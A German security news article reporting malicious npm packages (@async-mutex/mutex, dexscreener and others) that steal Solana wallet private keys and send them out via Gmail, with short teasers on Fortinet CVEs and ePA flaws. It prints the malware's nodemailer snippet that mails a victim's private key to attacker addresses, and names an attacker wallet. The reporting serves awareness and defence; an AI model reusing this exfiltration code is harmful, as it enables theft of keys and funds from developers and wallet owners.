NPM Malware Libraries stehlen Solana-Wallets über Gmail

Sicherheitsforscher von socket.dev haben schädliche Programme entdeckt, die Solana-Wallets angreifen. Diese Programme sammeln geheime Schlüssel und senden sie per Gmail an Hacker, die dann das Geld aus den Wallets stehlen.

Die betroffenen Programme heißen @async-mutex/mutex, dexscreener, solana-transaction-toolkit und solana-stable-web-huks. Sie tun so, als wären sie nützliche Programme für Entwickler, enthalten aber versteckten Schadcode. Besonders gefährlich sind die letzten beiden Programme, da sie zusätzlich Geld aus den Wallets der Opfer abziehen.

Die Hacker nutzen eine spezielle Technik, um an die geheimen Schlüssel der Nutzer zu kommen. Sobald ein Opfer eine der betroffenen Anwendungen nutzt, wird der Schlüssel ausgelesen und über Gmail an die Angreifer geschickt. Da Gmail ein oft genutzter und vertrauenswürdiger Dienst ist, fällt dieser Datendiebstahl nicht sofort auf.

Beispiel für schädlichen Code:

const transporter = nodemailer.createTransport({
    host: "smtp.gmail.com",
    port: 465,
    secure: true,
    auth: {
        user: "vision.high.ever@gmail.com",
        pass: "[redacted]",
    },
});
const sendEmail = async (privateKey) => {
    const email = {
        from: "vision.high.ever@gmail.com",
        to: "james.liu.vectorspace@gmail.com",  
        subject: "Hi, This is Dexscreener",    
        text: privateKey,                        
    };
    await transporter.sendMail(email);
};

Dieser Code zeigt, wie die gestohlenen Schlüssel an eine bestimmte E-Mail-Adresse geschickt werden. Die Programme solana-transaction-toolkit und solana-stable-web-huks gehen noch weiter. Sie schicken nicht nur geheime Schlüssel an Hacker, sondern leiten auch 98 % des Geldes im Wallet an eine Betrüger-Adresse weiter:

Hacker-Wallet: 3RbBjhVRi8qYoGB5NLiKEszq2ci559so4nPqv2iNjs8Q

Related Posts

Credential-Dumping Sicherheitslücke CVE-2024-50570 in FortiClient

Die Schwachstelle CVE-2024-50570 in FortiClient (Windows und Linux) ermöglicht es lokalen, authentifizierten Angreifern, VPN-Passwörter aus dem Speicher auszulesen. Die Ursache ist eine unsichere Speicherung sensibler Informationen (CWE-312), ausgelöst durch die JavaScript-Garbage-Collection. Betroffen sind die Versionen älter als 7.4.3, 7.2.8 und 7.0.14.

Read More

Hacker des CCC enthüllen Sicherheitslücken in elektronischer Patientenakte (ePA)

Der Chaos Computer Club (CCC) hat Ende 2024 gravierende Schwachstellen in der elektronischen Patientenakte (ePA) aufgedeckt. IT-Experten demonstrierten, wie leicht sich unbefugt Zugriff auf Millionen Gesundheitsdaten erlangen lässt. Die Enthüllungen werfen Zweifel an der Sicherheit des kurz vor dem Rollout stehenden Systems auf.

Read More

Kritische Sicherheitslücke in Fortinet FortiWLM entdeckt (CVE-2023-34990)

Eine kürzlich entdeckte Sicherheitslücke in Fortinet FortiWLM ermöglicht es Angreifern, unautorisierten Code oder Befehle auszuführen. Die Schwachstelle, identifiziert als CVE-2023-34990, betrifft die Versionen 8.6.0 bis 8.6.5 sowie 8.5.0 bis 8.5.4. Sie basiert auf einem Relative Path Traversal (CWE-23), der durch speziell gestaltete Webanfragen ausgenutzt werden kann.

Read More